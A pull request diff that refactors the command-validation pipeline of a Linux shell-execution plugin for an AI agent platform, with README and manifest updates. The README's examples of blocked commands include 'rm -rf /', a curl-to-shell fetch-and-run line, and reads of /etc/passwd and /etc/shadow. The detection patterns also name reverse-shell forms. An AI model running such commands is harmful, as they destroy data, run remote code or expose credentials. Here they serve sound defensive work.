### PR TITLE
refactor(LinuxShellExecutor): 统一校验入口至 execute() 

### DIFF
--- a/Plugin/LinuxShellExecutor/LinuxShellExecutor.js
+++ b/Plugin/LinuxShellExecutor/LinuxShellExecutor.js
@@ -345,7 +345,18 @@ class WhitelistValidator {
         this.commands = whitelist.commands || {};
         this.globalRestrictions = whitelist.globalRestrictions || {};
     }
-    
+
+    /**
+     * 检查命令是否在白名单中
+     * @returns {object} { inWhitelist: boolean, cmdConfig?: object, parsedCommand?: object }
+     */
+    check(command) {
+        const parsed = this.parseCommand(command);
+        const cmdConfig = this.commands[parsed.command];
+        if (!cmdConfig) return { inWhitelist: false };
+        return { inWhitelist: true, cmdConfig, parsedCommand: parsed };
+    }
+
     validate(command) {
         // 诊断日志：记录验证开始
         logDiagInfo(`[LinuxShellExecutor][DIAG] WhitelistValidator.validate() 被调用`);
@@ -425,7 +436,40 @@ class WhitelistValidator {
                 }
             }
         }
-        
+
+        // 子命令约束：如果 allowedArgs 包含非flag项（如 systemctl 的 status、docker 的 ps），
+        // 则第一个位置参数必须匹配，否则拒绝（降级到灰名单需验证码）
+        const subcommandArgs = (cmdConfig.allowedArgs || []).filter(a => !a.startsWith('-'));
+        if (subcommandArgs.length > 0 && parsed.paths.length > 0) {
+            const positionalStr = parsed.paths.join(' ');
+            const matchedSubcommand = subcommandArgs.some(sc => positionalStr === sc || positionalStr.startsWith(sc + ' '));
+            if (!matchedSubcommand) {
+                return {
+                    passed: false,
+                    reason: `子命令 "${parsed.paths[0]}" 不被允许用于 "${parsed.command}"`,
+                    layer: 'whitelist',
+                    severity: 'medium'
+                };
+            }
+        }
+
+        // 查询约束：如果配置了 allowedQueries（如 mysql -e），-e 内容必须匹配允许的查询
+        if (cmdConfig.allowedQueries && cmdConfig.allowedQueries.length > 0) {
+            const hasExecuteFlag = parsed.args.some(a => a.startsWith('-e'));
+            if (hasExecuteFlag) {
+                const commandUpper = command.toUpperCase();
+                const queryMatched = cmdConfig.allowedQueries.some(q => commandUpper.includes(q.toUpperCase()));
+                if (!queryMatched) {
+                    return {
+                        passed: false,
+                        reason: `查询不在允许的查询列表中`,
+                        layer: 'whitelist',
+                        severity: 'medium'
+                    };
+                }
+            }
+        }
+
         return { passed: true, parsedCommand: parsed };
     }
     
@@ -953,16 +997,17 @@ class SecurityLevelValidator {
     }
     
     /**
-     * 验证完整命令（包括管道和重定向）
+     * 检查特殊操作符（普适硬护栏，不可通过授权码绕过）
+     * 检查分号(semicolon)、后台执行(backgroundAmp)、子shell(subshell)
+     * 允许 && 和 ||
      */
-    validate(command) {
-        // ROB-02: 验证特殊操作符
+    checkSpecialOperators(command) {
         for (const [opName, opConfig] of Object.entries(this.specialOperators)) {
             if (opConfig.allowed === false) {
                 let pattern;
                 switch(opName) {
                     case 'semicolon': pattern = /;/; break;
-                    case 'backgroundAmp': pattern = /&(?![&>])/; break; // 排除 && 和重定向 &>
+                    case 'backgroundAmp': pattern = /(?<!&)&(?![&>])/; break;
                     case 'subshell': pattern = /\$\(|\`/; break;
                     default: continue;
                 }
@@ -970,11 +1015,23 @@ class SecurityLevelValidator {
                     return {
                         passed: false,
                         reason: `检测到禁止的特殊操作符: ${opName} (${opConfig.reason})`,
-                        layer: 'securityLevel', severity: 'critical'
+                        opName,
+                        layer: 'securityLevel',
+                        severity: 'critical'
                     };
                 }
             }
         }
+        return { passed: true };
+    }
+
+    /**
+     * 验证完整命令（包括管道和重定向）
+     */
+    validate(command) {
+        // ROB-02: 验证特殊操作符（委托给 checkSpecialOperators）
+        const specialOpResult = this.checkSpecialOperators(command);
+        if (!specialOpResult.passed) return specialOpResult;
 
         // Quote-aware pipe/redirect detection: ignore | and > inside quoted strings
         // e.g. grep "Error:|Warning:" file.log should NOT be treated as a pipeline
@@ -1795,7 +1852,7 @@ class LinuxShellExecutor {
         
         this.securityLevels = {
             basic: ['blacklist'],
-            standard: ['blacklist', 'whitelist', 'sandbox'],
+            standard: ['blacklist', 'whitelist', 'ast', 'sandbox'],
             high: ['blacklist', 'whitelist', 'ast', 'sandbox'],
             maximum: ['blacklist', 'whitelist', 'ast', 'sandbox', 'audit']
         };
@@ -2195,7 +2252,12 @@ class LinuxShellExecutor {
         const hostId = options.hostId;
         const logFollowCommand = this._classifyLogFollowCommand(command);
         const isLongRunning = options.isLongRunning === true || Boolean(logFollowCommand);
-        const bypassWhitelist = options.bypassWhitelist === true;
+        // 认证上下文：authCode=正确的验证码, requireAdmin=用户提交的验证码, doubleConfirm=二次确认标志
+        // bypassWhitelist 已废弃：灰名单现在在 execute() 内强制要求验证码，不再被授权跳过
+        const authCode = options.authCode || null;
+        const requireAdmin = options.requireAdmin;
+        const doubleConfirm = options.doubleConfirm === true;
+        const authOk = Boolean(authCode && requireAdmin && String(requireAdmin) === authCode);
 
         // v1.1.5: 自动应用静默化补丁
         const patchedCommand = this._patchCommandForNonInteractive(command);
@@ -2263,6 +2325,20 @@ class LinuxShellExecutor {
                 return this._buildPrivilegeEscalationResponse(command, privilegeEscalation);
             }
 
+            // 特殊操作符硬护栏（普适，不可通过授权码绕过）
+            const specialOpResult = this.securityLevelValidator.checkSpecialOperators(command);
+            auditEntry.layers.push({ name: 'specialOperators', result: specialOpResult });
+            if (!specialOpResult.passed) {
+                auditEntry.status = 'blocked';
+                auditEntry.reason = specialOpResult.reason;
+                auditEntry.layer = 'securityLevel';
+                auditEntry.severity = 'critical';
+                if (enabledLayers.includes('audit')) {
+                    await this.auditLogger.log(auditEntry);
+                }
+                throw new Error(`[安全分级] ${specialOpResult.reason}。该操作不可通过授权码绕过。`);
+            }
+
             // 第一层：黑名单过滤
             if (enabledLayers.includes('blacklist')) {
                 const blacklistResult = this.blacklistFilter.check(command);
@@ -2285,44 +2361,118 @@ class LinuxShellExecutor {
             logDiagInfo(`[LinuxShellExecutor][DIAG] enabledLayers: ${JSON.stringify(enabledLayers)}`);
             logDiagInfo(`[LinuxShellExecutor][DIAG] whitelist 层是否启用: ${enabledLayers.includes('whitelist')}`);
             
-            if (enabledLayers.includes('whitelist') && !isPresetCommand && !bypassWhitelist) {
-                // 预设命令或管理员授权逃逸跳过白名单验证
-                logDiagInfo(`[LinuxShellExecutor][DIAG] ${isPresetCommand ? '预设命令' : '授权逃逸'}，跳过白名单验证`);
-                
-                // 先检查是否在灰名单中（灰名单命令已在 main() 中验证过权限）
+            if (enabledLayers.includes('whitelist') && !isPresetCommand) {
+                // 列表驱动验证：白名单(免费放行) → 灰名单(需验证码) → 未知(需验证码逃逸)
+
+                // 先检查白名单（免费放行，仅验证参数/路径）
+                const whitelistCheck = this.whitelistValidator.check(command);
                 const graylistCheck = this.graylistValidator.check(command);
-                
-                if (graylistCheck.inGraylist) {
-                    // 灰名单命令：使用灰名单验证（验证参数和路径）
-                    logDiagInfo(`[LinuxShellExecutor][DIAG] 命令在灰名单中，使用灰名单验证...`);
-                    const graylistResult = this.graylistValidator.validate(command);
-                    logDiagInfo(`[LinuxShellExecutor][DIAG] 灰名单验证结果: ${JSON.stringify(graylistResult)}`);
-                    auditEntry.layers.push({ name: 'graylist', result: graylistResult });
-                    if (!graylistResult.passed) {
-                        auditEntry.status = 'blocked';
-                        auditEntry.reason = graylistResult.reason;
-                        auditEntry.layer = 'graylist';
-                        auditEntry.severity = graylistResult.severity;
-                        if (enabledLayers.includes('audit')) {
-                            await this.auditLogger.log(auditEntry);
-                        }
-                        throw new Error(`[灰名单] ${graylistResult.reason}`);
-                    }
-                } else {
-                    // 白名单命令：使用白名单验证
+
+                // 尝试白名单验证：通过则免费放行；失败则降级到灰名单/未知
+                let whitelistPassed = false;
+                let whitelistFailResult = null;
+
+                if (whitelistCheck.inWhitelist) {
+                    // 白名单命令：免费放行 + 参数/路径验证
                     logDiagInfo(`[LinuxShellExecutor][DIAG] 开始白名单验证...`);
                     const whitelistResult = this.whitelistValidator.validate(command);
                     logDiagInfo(`[LinuxShellExecutor][DIAG] 白名单验证结果: ${JSON.stringify(whitelistResult)}`);
                     auditEntry.layers.push({ name: 'whitelist', result: whitelistResult });
-                    if (!whitelistResult.passed) {
+                    if (whitelistResult.passed) {
+                        whitelistPassed = true;
+                    } else {
+                        whitelistFailResult = whitelistResult;
+                    }
+                }
+
+                if (!whitelistPassed) {
+                    if (graylistCheck.inGraylist) {
+                        // 灰名单命令：需要管理员验证码 + 参数/路径验证
+                        const riskLevel = graylistCheck.riskLevel;
+                        const riskLevelConfig = this.graylistValidator.riskLevels[riskLevel] || {};
+                        const needsDoubleConfirm = riskLevelConfig.doubleConfirm === true;
+
+                        if (!authOk) {
+                            auditEntry.layers.push({ name: 'graylist', result: { passed: false, reason: '需要管理员验证码' } });
+                            auditEntry.status = 'blocked';
+                            auditEntry.reason = `灰名单命令需要管理员验证码`;
+                            auditEntry.layer = 'graylist';
+                            auditEntry.severity = 'high';
+                            if (enabledLayers.includes('audit')) {
+                                await this.auditLogger.log(auditEntry);
+                            }
+                            let authMsg;
+                            if (!requireAdmin) {
+                                authMsg = `[灰名单] 命令 "${graylistCheck.parsedCommand.command}" 需要管理员验证码（风险级别: ${riskLevel}）。请提供 requireAdmin 参数（6位验证码）。`;
+                            } else if (!authCode) {
+                                authMsg = `无法获取管理员验证码。请确保主服务器配置正确。`;
+                            } else {
+                                authMsg = `管理员验证码错误。`;
+                            }
+                            throw new Error(authMsg);
+                        }
+
+                        logDiagInfo(`[LinuxShellExecutor][DIAG] 命令在灰名单中，使用灰名单验证...`);
+                        const graylistResult = this.graylistValidator.validate(command);
+                        logDiagInfo(`[LinuxShellExecutor][DIAG] 灰名单验证结果: ${JSON.stringify(graylistResult)}`);
+                        auditEntry.layers.push({ name: 'graylist', result: graylistResult });
+                        if (!graylistResult.passed) {
+                            auditEntry.status = 'blocked';
+                            auditEntry.reason = graylistResult.reason;
+                            auditEntry.layer = 'graylist';
+                            auditEntry.severity = graylistResult.severity;
+                            if (enabledLayers.includes('audit')) {
+                                await this.auditLogger.log(auditEntry);
+                            }
+                            throw new Error(`[灰名单] ${graylistResult.reason}`);
+                        }
+
+                        // critical 风险级别（reboot/shutdown/init）需要二次确认
+                        if (needsDoubleConfirm && !doubleConfirm) {
+                            auditEntry.layers.push({ name: 'graylist', result: { passed: false, reason: '需要二次确认' } });
+                            auditEntry.status = 'blocked';
+                            auditEntry.reason = `高危操作需要二次确认`;
+                            auditEntry.layer = 'graylist';
+                            auditEntry.severity = 'critical';
+                            if (enabledLayers.includes('audit')) {
+                                await this.auditLogger.log(auditEntry);
+                            }
+                            throw new Error(`[灰名单] 高危操作需要二次确认！请同时提供 doubleConfirm: true 参数。\n命令: ${command}\n风险级别: ${riskLevel}`);
+                        }
+                    } else if (whitelistCheck.inWhitelist) {
+                        // 在白名单中但操作不允许，且不在灰名单中（如 cat /etc/shadow）
+                        // 不可通过授权码逃逸
                         auditEntry.status = 'blocked';
-                        auditEntry.reason = whitelistResult.reason;
+                        auditEntry.reason = whitelistFailResult.reason;
                         auditEntry.layer = 'whitelist';
-                        auditEntry.severity = whitelistResult.severity;
+                        auditEntry.severity = whitelistFailResult.severity;
                         if (enabledLayers.includes('audit')) {
                             await this.auditLogger.log(auditEntry);
                         }
-                        throw new Error(`[白名单] ${whitelistResult.reason}`);
+                        throw new Error(`[白名单] ${whitelistFailResult.reason}`);
+                    } else {
+                        // 不在任何名单中（未知命令）：需要管理员验证码逃逸
+                        if (!authOk) {
+                            auditEntry.layers.push({ name: 'securityLevel', result: { passed: false, reason: '命令不在任何名单中' } });
+                            auditEntry.status = 'blocked';
+                            auditEntry.reason = `命令不在任何名单中`;
+                            auditEntry.layer = 'securityLevel';
+                            auditEntry.severity = 'medium';
+                            if (enabledLayers.includes('audit')) {
+                                await this.auditLogger.log(auditEntry);
+                            }
+                            let authMsg;
+                            if (!requireAdmin) {
+                                authMsg = `[安全分级] 命令 "${extractBaseCommand(command)}" 不在任何名单中，如需执行请提供正确的管理员验证码。`;
+                            } else if (!authCode) {
+                                authMsg = `无法获取管理员验证码。请确保主服务器配置正确。`;
+                            } else {
+                                authMsg = `管理员验证码错误。`;
+                            }
+                            throw new Error(authMsg);
+                        }
+                        logWarn(`[LinuxShellExecutor] 未知命令 "${extractBaseCommand(command)}" 通过授权码逃逸`);
+                        auditEntry.layers.push({ name: 'securityLevel', result: { passed: true, reason: '未知命令通过授权码逃逸' } });
                     }
                 }
             }
@@ -2611,61 +2761,6 @@ async function runToolCall(args = {}, options = {}) {
                 } else {
                     logDebug(`[LinuxShellExecutor] 预设 "${presetInfo.name}" 为 ${presetSecurityLevel} 级别，自动放行`);
                 }
-            } else {
-                for (const cmd of commandsToExecute) {
-                    const baseCommand = extractBaseCommand(cmd);
-                    logDebug(`[LinuxShellExecutor] 安全分级验证: "${baseCommand}"`);
-
-                    const levelValidation = executor.securityLevelValidator.validate(cmd);
-
-                    if (!levelValidation.passed) {
-                        const isExecuteCommand = baseCommand === 'execute';
-
-                        if ((levelValidation.isUnknown || isExecuteCommand) && args.requireAdmin && authCode && String(args.requireAdmin) === authCode) {
-                            const astResult = executor.astAnalyzer.analyze(cmd);
-                            if (!astResult.passed) {
-                                const reasons = astResult.risks.map(r => r.description).join('; ');
-                                logWarn(`[LinuxShellExecutor] 逃逸执行被 AST 拦截: ${reasons}`);
-                                throw new Error(`[安全底线] 即使使用授权码，也禁止执行高危模式指令: ${reasons}`);
-                            }
-
-                            logWarn(`[LinuxShellExecutor] 未知命令 "${baseCommand}" 通过授权码验证及 AST 扫描，允许逃逸执行`);
-                        } else {
-                            if (levelValidation.isUnknown || isExecuteCommand) {
-                                throw new Error(`[安全分级] ${levelValidation.reason}。如需强制执行，请提供正确的管理员验证码。`);
-                            }
-                            throw new Error(`[安全分级] ${levelValidation.reason}`);
-                        }
-                    }
-
-                    const { highestRiskLevel, requireConfirm } = levelValidation;
-                    logDebug(`[LinuxShellExecutor] 命令 "${baseCommand}" 安全级别: ${highestRiskLevel}, 需要确认: ${requireConfirm}`);
-
-                    if (requireConfirm) {
-                        const isDoubleConfirm = requireConfirm === 'double';
-
-                        if (!args.requireAdmin) {
-                            const confirmPrompt = executor.securityLevelValidator.generateConfirmPrompt(levelValidation, cmd);
-                            throw new Error(`${confirmPrompt.prompt}\n请提供 requireAdmin 参数（6位验证码）。`);
-                        }
-
-                        if (!authCode) {
-                            throw new Error('无法获取管理员验证码。请确保主服务器配置正确。');
-                        }
-
-                        if (String(args.requireAdmin) !== authCode) {
-                            throw new Error('管理员验证码错误。');
-                        }
-
-                        if (isDoubleConfirm && !args.doubleConfirm) {
-                            throw new Error(`高危操作需要二次确认！请同时提供 doubleConfirm: true 参数。\n命令: ${cmd}\n风险级别: ${highestRiskLevel}`);
-                        }
-
-                        logDebug(`[LinuxShellExecutor] ${highestRiskLevel} 级别命令验证成功`);
-                    } else {
-                        logDebug(`[LinuxShellExecutor] 命令 "${baseCommand}" 为 ${highestRiskLevel} 级别，自动放行`);
-                    }
-                }
             }
         }
 
@@ -2737,7 +2832,9 @@ async function runToolCall(args = {}, options = {}) {
                 disconnectOnCommandTimeout: args.disconnectOnCommandTimeout === undefined
                     ? undefined
                     : parseBooleanValue(args.disconnectOnCommandTimeout),
-                bypassWhitelist: Boolean(args.requireAdmin && authCode && String(args.requireAdmin) === authCode),
+                authCode: authCode,
+                requireAdmin: args.requireAdmin,
+                doubleConfirm: args.doubleConfirm,
                 signal: options.context?.signal
             };
             if (hasExplicitUsePool) {

--- a/Plugin/LinuxShellExecutor/README.md
+++ b/Plugin/LinuxShellExecutor/README.md
@@ -1,6 +1,6 @@
 # LinuxShellExecutor v1.2.0
 
-六层安全防护的 Linux Shell 命令执行器，专为 VCP Agent 设计。
+统一八层验证的 Linux Shell 命令执行器，专为 VCP Agent 设计。所有命令校验收敛至 execute() 内的单一顺序管线（名单驱动 + AST 语义基线）。
 
 ## 📝 本次提交维护记录 (连接池持久化修订)
 
@@ -98,32 +98,57 @@
 
 ## 架构概览
 
+`runToolCall` 现为**轻量编排器**：解析参数 → 预设展开 → 预设安全确认（`write`/`danger` 预设需 `requireAdmin`，`danger` 另需 `doubleConfirm`）→ 特殊动作分发（`listHosts`/`testConnection`/`getStatus`/`listPresets`）→ 提权命令前置拦截 → 组装 `executeOptions`（含 `authCode`/`requireAdmin`/`doubleConfirm`）→ 调用 `executor.execute(cmd, executeOptions)` → 聚合并格式化结果。
+
+> 旧的「System A」安全分级块已从 `runToolCall` **移除**。所有命令校验统一收敛至 `execute()` 内的单一顺序管线。
+
 ```
-┌─────────────────────────────────────────────────────────────┐
-│                    LinuxShellExecutor v0.4.0                │
-├─────────────────────────────────────────────────────────────┤
-│  ┌─────────────────────────────────────────────────────┐   │
-│  │                   主机管理器                         │   │
-│  │  ┌─────────┐  ┌─────────┐  ┌─────────┐             │   │
-│  │  │ local   │  │dev-server│ │prod-srv │  ...        │   │
-│  │  │ 本地    │  │ SSH Key │  │ SSH Key │             │   │
-│  │  └─────────┘  └─────────┘  └─────────┘             │   │
-│  └─────────────────────────────────────────────────────┘   │
-│                          ↓                                  │
-│  ┌─────────────────────────────────────────────────────┐   │
-│  │              三级权限控制                            │   │
-│  │  ┌─────────┐    ┌─────────┐             │   │
-│  │  │ 黑名单  │→│ 白名单  │→│ 灰名单  │             │   │
-│  │  │ 禁止    │  │ 免验证  │  │ 需验证  │             │   │
-│  │  └─────────┘  └─────────┘  └─────────┘             │   │
-│  └─────────────────────────────────────────────────────┘   │
-│                          ↓                                  │
-│  ┌─────────────────────────────────────────────────────┐   │
-│  │              六层安全防护                            │   │
-│  │  1.黑名单 → 2.白名单 → 3.灰名单 → 4.AST → 5.沙箱 → 6.审计│   │
-│  └─────────────────────────────────────────────────────┘   │
-└─────────────────────────────────────────────────────────────┘
+runToolCall（轻量编排器）
+  参数解析 → 预设展开 → 预设安全确认 → 动作分发
+        → 提权前置拦截 → 组装 executeOptions → execute()
+                          │
+                          ▼
+execute() 八层验证管线（名单驱动，单一入口）
+  1.提权前置   2.特殊操作符硬护栏   3.黑名单
+  4.白名单(免验证) → 5.灰名单(需验证) → 6.未知(授权逃逸)
+  7.AST 语义基线   8.执行(SSH 远程 / 本地沙箱)
+                          │
+                          ▼
+  共享 SSHManager  /  SandboxManager（bubblewrap/firejail/docker/none）
 ```
+
+## 验证层序（execute() 八层管线）
+
+以下八层在 `execute()` 内**按顺序**执行，命中即拦截。错误前缀供客户端识别拦截层。
+
+| # | 层 | 作用 | 拦截方式 / 前缀 | 授权码可绕过 |
+|---|----|------|-----------------|--------------|
+| 1 | 提权前置 (preflight) | 检测 `sudo`/`pkexec`/`doas`/`su -` | 返回 `interaction_required`（非抛错） | 否 |
+| 2 | 特殊操作符硬护栏 | 拦截 `;`、后台 `&`（正则 `/(?<!&)&(?![&>])/`，排除 `&&`/`&>`）、子shell `$()`/`` ` `` | 抛 `[安全分级] ... 该操作不可通过授权码绕过。` | 否（授权码正确也不绕过） |
+| 3 | 黑名单 | `config.env` 的 `FORBIDDEN_PATTERNS`（正则）+ `FORBIDDEN_COMMANDS`（精确） | 抛 `[黑名单]` | 否 |
+| 4 | 白名单 (`whitelist.json`) | 免验证放行；校验 allowedArgs、pathRestrictions(含 `..` 遍历)、子命令、allowedQueries；管道走 `validatePipeline`。白名单内但校验失败（如 `cat /etc/shadow`） | 抛 `[白名单]` | 否（不可逃逸） |
+| 5 | 灰名单 (`graylist.json`) | 需授权码 + 参数/路径校验。`critical` 风险（reboot/shutdown/init）另需 `doubleConfirm:true`；low/medium/high 仅单次授权 | 抛 `[灰名单]`（3 分支消息） | 是（需正确 `requireAdmin`） |
+| 6 | 未知命令（不在任何名单） | 授权码逃逸；记录告警「未知命令通过授权码逃逸」 | 抛 `[安全分级]`（3 分支消息） | 是（需正确 `requireAdmin`，无 doubleConfirm） |
+| 7 | AST 语义基线 (`ASTAnalyzer`) | 始终运行，仅 critical 级阻断：命令注入 `$()`、网络外泄 `curl\|sh`/`bash -i /dev/tcp`、提权 `sudo` 等 | 抛 `[AST分析]` | 否（授权码不绕过） |
+| 8 | 执行 | SSH 远程（共享 SSHManager）或本地沙箱（bubblewrap/firejail/docker/none） | — | — |
+
+> **防御纵深**：`&&`/`||` 可通过第 2 层，但普通命令仍被白名单 `forbiddenCharacters`（第 4 层，含 `;`/`&&`/`||`/`` ` ``/`$(`/`${`/`>`/`>>`/`<`/`&` 等）限制。预设命令 `preset:` 展开后 `isPresetCommand=true`，**跳过白名单层**，故预设模板内的 `&&` 可正常执行。
+> **AST 下沉**：`ast` 层现已从 `standard` 起启用（此前仅 `high`/`maximum`）。
+
+## 授权模型与错误前缀
+
+**授权三要素**
+- `authCode`：真正的管理员验证码，由 `resolveAdminAuthCode(context)` 解析 = `context.decryptedAuthCode` ‖ `process.env.DECRYPTED_AUTH_CODE`（服务端注入，用户不直接传入）。
+- `requireAdmin`：用户提交的验证码。
+- `doubleConfirm`：二次确认标志（仅灰名单 `critical` 风险 / `danger` 预设需要）。
+- 判定：`authOk = authCode && requireAdmin && String(requireAdmin) === authCode`。
+
+**授权失败 3 分支消息**（灰名单与未知命令共用）
+1. 未提供 `requireAdmin` → 灰名单：`[灰名单] 命令 "X" 需要管理员验证码（风险级别: R）。请提供 requireAdmin 参数（6位验证码）。`；未知：`[安全分级] 命令 "X" 不在任何名单中，如需执行请提供正确的管理员验证码。`
+2. 已提供 `requireAdmin` 但服务端无法解析 `authCode` → `无法获取管理员验证码。请确保主服务器配置正确。`
+3. 已提供但错误 → `管理员验证码错误。`
+
+**错误前缀约定**（客户端据此识别拦截层，勿改）：`[黑名单]` / `[灰名单]` / `[白名单]` / `[AST分析]` / `[安全分级]`。
 
 ## 安装依赖
 
@@ -342,10 +367,12 @@ action:「始」getStatus「末」
 | `action` | string | ✓* | 特殊操作：listHosts/testConnection/getStatus/listPresets |
 | `hostId` | string | | 目标主机ID，默认 'local' |
 | `isLongRunning` | boolean | | 是否为长待机指令（设为 true 后任务转入后台） |
-| `authCode` | string | | 管理员授权码，用于强制执行 unknown 命令 |
 | `timeout` | number | | 超时时间（毫秒），默认 30000 |
 | `outputFormat` | string | | 输出格式：raw/formatted/json，默认 'formatted' |
-| `requireAdmin` | string | 条件必需 | 管理员验证码，write/danger 级别命令必需 |
+| `requireAdmin` | string | 条件必需 | 用户提交的管理员验证码（6位）。用于灰名单授权、未知命令授权逃逸、write/danger 预设确认 |
+| `doubleConfirm` | boolean | 条件必需 | 二次确认标志。灰名单 critical 风险（reboot/shutdown/init）与 danger 预设必需 |
+
+> `authCode`（真正的管理员验证码）由服务端从 `context.decryptedAuthCode` / `DECRYPTED_AUTH_CODE` 注入，用户不直接传入；用户侧只提交 `requireAdmin` 与 `doubleConfirm`。
 
 *注：command 和 action 二选一
 
@@ -400,12 +427,16 @@ action:「始」getStatus「末」
 
 ## 安全等级
 
-| 等级 | 启用层 | 适用场景 |
-|------|--------|----------|
-| `basic` | 黑名单 | 内部可信环境 |
-| `standard` | 黑名单 + 白名单/灰名单 + 沙箱 | 一般生产环境（默认） |
-| `high` | 黑名单 + 白名单/灰名单 + AST + 沙箱 | 敏感数据环境 |
-| `maximum` | 全部六层 | 公开 API / 多租户 |
+启用层由 `enabledLayers` 映射决定（代码驱动，构造器内定义）：
+
+| 等级 | 启用层 (enabledLayers) | 适用场景 |
+|------|------------------------|----------|
+| `basic` | blacklist | 内部可信环境 |
+| `standard` | blacklist + whitelist + **ast** + sandbox | 一般生产环境（默认） |
+| `high` | blacklist + whitelist + ast + sandbox | 敏感数据环境 |
+| `maximum` | blacklist + whitelist + ast + sandbox + audit | 公开 API / 多租户 |
+
+> 本次重构将 **AST 下沉至 `standard`**（此前仅 high/maximum）。`ast` 与 `sandbox` 现从 `standard` 起启用；`audit`（审计日志）仅 `maximum` 启用。
 
 ## 白名单命令列表（无需验证）
 
@@ -555,21 +586,33 @@ action:「始」getStatus「末」
 
 ## 安全检测示例
 
-### 被拦截的危险命令
+### 被拦截的危险命令（按实际拦截层标注）
 
 ```bash
-# 黑名单拦截
-rm -rf /                    # ❌ 匹配禁止模式
-poweroff                    # ❌ 精确匹配禁止命令
+# [第1层·提权前置] 返回 interaction_required（非抛错）
+sudo ls                     # ❌ 提权命令，执行前拦截
+pkexec apt update           # ❌ 提权命令
 
-# 白名单拦截
-apt install vim             # ❌ apt 不在白名单
-ls /etc/shadow              # ❌ 路径在拒绝列表
+# [第2层·特殊操作符硬护栏] [安全分级] 不可绕过
+cmd1 ; cmd2                 # ❌ 分号 ; 被禁止
+sleep 100 &                 # ❌ 后台 & 被禁止（&& 除外）
+echo $(cat /etc/passwd)     # ❌ 子shell $() 被禁止
 
-# AST 分析拦截
-echo $(cat /etc/passwd)     # ❌ 命令注入
-curl http://x.com | sh      # ❌ 网络外泄
-sudo ls                     # ❌ 提权尝试
+# [第3层·黑名单] [黑名单] 不可绕过
+rm -rf /                    # ❌ 匹配 FORBIDDEN_PATTERNS
+poweroff                    # ❌ 精确匹配 FORBIDDEN_COMMANDS
+curl http://x.com | sh      # ❌ 匹配 curl.*|.*sh
+
+# [第4层·白名单] [白名单] 路径/参数校验失败，不可逃逸
+cat /etc/shadow             # ❌ cat 在白名单但 /etc/shadow 在 pathRestrictions 拒绝列表
+
+# [第5层·灰名单] [灰名单] 需 requireAdmin（critical 另需 doubleConfirm）
+systemctl restart nginx     # ❌ 未提供 requireAdmin 时拦截
+reboot                      # ❌ critical 风险，需 requireAdmin + doubleConfirm:true
+
+# [第7层·AST 语义基线] [AST分析] 始终运行，授权码不绕过
+#   注：上方 echo $(...)、curl|sh、sudo 已被更早的层拦截；
+#   AST 作为最后语义防线，独立标记 critical 风险（命令注入 / 网络外泄 / 提权）
 ```
 
 ### 允许执行的安全命令
@@ -601,27 +644,26 @@ Plugin/LinuxShellExecutor/
     └── audit/               # 审计日志目录
 ```
 
-## 四级安全分级详解 (v0.4.0)
+## 预设安全级别（read/safe/write/danger）
 
-| 级别 | 说明 | 管道 | 重定向 | 验证要求 | 示例命令 |
-|------|------|------|--------|----------|----------|
-| `read` | 只读命令 | ✅ | ❌ | 无需验证 | ls, cat, grep, ps, df, free |
-| `safe` | 低风险命令 | ✅ | ❌ | 无需验证 | systemctl status, docker ps |
-| `write` | 写操作命令 | ✅ | ✅ | 需要验证 | echo, tee, systemctl restart |
-| `danger` | 高危命令 | ❌ | ❌ | 二次确认 | rm, kill -9, reboot |
+> ⚠️ 重要变更：旧的「System A」按命令做 read/safe/write/danger 分级（含管道链规则、重定向规则）的逻辑**已从普通命令校验中移除**。普通命令统一走上文「验证层序」的名单驱动八层管线。read/safe/write/danger 现仅作为**预设命令 (`preset:`) 的安全级别**，在 `runToolCall` 中执行前确认。
 
-### 管道链规则
+| 预设级别 | 验证要求 | 说明 |
+|----------|----------|------|
+| `read` | 无需验证 | 只读诊断预设，自动放行 |
+| `safe` | 无需验证 | 低风险预设，自动放行 |
+| `write` | 需要 `requireAdmin` | 写操作预设，需管理员验证码 |
+| `danger` | 需要 `requireAdmin` + `doubleConfirm:true` | 高危预设，需验证码 + 二次确认 |
 
-只允许以下安全级别组合的管道链：
-- `read → read`（如 `ps aux | grep nginx`）
-- `read → safe`（如 `cat log | head -100`）
-- `safe → read`（如 `docker logs | grep error`）
+预设级别取自 `presets.json` 中各预设的 `securityLevel` 字段（默认 `safe`）。`write`/`danger` 预设在 `runToolCall` 展开后、调用 `execute()` 前完成授权确认；`danger` 预设另需 `doubleConfirm: true`。
 
-### 重定向规则
+### 管道与重定向（现行机制）
 
-- 只有 `write` 级别命令允许使用重定向
-- 允许的目标路径：`/tmp/*`, `/var/log/*`, `~/*`
-- 禁止的目标路径：`/etc/*`, `/bin/*`, `/sbin/*`, `/usr/*`
+旧的「按安全级别组合的管道链规则」与「仅 write 允许重定向」规则已废弃，现行机制为：
+- **特殊操作符硬护栏**（第 2 层）：拦截 `;`、后台 `&`、子shell `$()`/`` ` ``；`&&`/`||` 可通过此层。
+- **白名单 `forbiddenCharacters`**（第 4 层）：对普通命令限制 `;`、`&&`、`||`、`` ` ``、`$(`、`${`、`>`、`>>`、`<`、`<<`、`&` 等（预设命令跳过此层）。
+- **白名单 `validatePipeline`**：管道命令须命中白名单，且管道成员受 `allowedPipeCommands` / `forbiddenInPipe` 约束，深度受 `maxPipelineDepth` 限制。
+- 路径访问由各名单的 `pathRestrictions`（allowed/denied + `..` 遍历检查）控制。
 
 ## 预设诊断命令 (v0.4.0)
 

--- a/Plugin/LinuxShellExecutor/plugin-manifest.json
+++ b/Plugin/LinuxShellExecutor/plugin-manifest.json
@@ -3,7 +3,7 @@
   "name": "LinuxShellExecutor",
   "version": "1.2.0",
   "displayName": "Linux Shell 安全执行器",
-  "description": "六层安全防护的 Linux Shell 命令执行器。支持多发行版静默安装、异步任务托管、交互阻塞探测及跨插件联动监控。",
+  "description": "统一八层验证的 Linux Shell 命令执行器。所有命令校验收敛至 execute() 内的单一顺序管线（名单驱动 + AST 语义基线）。支持多发行版静默安装、异步任务托管、交互阻塞探测及跨插件联动监控。",
   "author": "VCP Team",
   "pluginType": "hybridservice",
   "requiresAdmin": true,
@@ -26,7 +26,7 @@
     "invocationCommands": [
       {
         "commandIdentifier": "LinuxShellExecutor",
